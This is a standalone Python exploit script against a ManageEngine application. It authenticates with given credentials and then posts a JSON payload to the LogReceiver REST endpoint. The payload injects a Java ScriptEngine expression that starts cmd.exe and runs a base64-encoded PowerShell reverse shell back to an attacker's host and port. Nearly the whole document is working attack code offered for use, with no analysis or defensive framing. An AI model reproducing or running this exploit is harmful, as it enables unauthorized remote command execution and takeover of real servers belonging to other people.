#!/usr/bin/env python3 import requests import urllib3 import base64 import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def exploit(target_url, username, password, lhost, lport): session = requests.Session() # 1. Authenticate to ManageEngine login_url = f"{target_url}/j_security_check" data = { 'j_username': username, 'j_password': password, 'submit': 'Login' } try: login_response = session.post( login_url, data=data, verify=False, timeout=10 ) if 'loginError' in login_response.text: print("[-] Authentication failed") return False except Exception as e: print(f"[-] Connection error: {str(e)}") return False # 2. Prepare reverse shell payload powershell_cmd = f"$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()" encoded_cmd = base64.b64encode(powershell_cmd.encode('utf-16le')).decode() # 3. Exploit the deserialization vulnerability exploit_url = f"{target_url}/RestAPI/LogReceiver" headers = { 'Content-Type': 'application/json' } payload = { "logType":"name", "logData":"raw", "hostName":"localhost", "appName":"app", "logSource":"local", "metaData": { "systemProperty": { "com.adventnet.servicemanager.install.dir": f"\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/c','powershell -enc {encoded_cmd}']).start()\")" } } } try: print("[+] Sending exploit payload...") response = session.post( exploit_url, json=payload, headers=headers, verify=False, timeout=15 ) if response.status_code == 200: print("[+] Exploit triggered successfully!") print("[+] Check your netcat listener for shell") else: print(f"[-] Exploit failed (Status code: {response.status_code})") except Exception as e: print(f"[-] Exploit failed: {str(e)}") if __name__ == "__main__": if len(sys.argv) != 6: print(f"Usage: {sys.argv[0]} ") print(f"Example: {sys.argv[0]} https://localhost:8443 admin admin 192.168.45.217 9001") sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] lhost = sys.argv[4] lport = sys.argv[5] exploit(target_url, username, password, lhost, lport)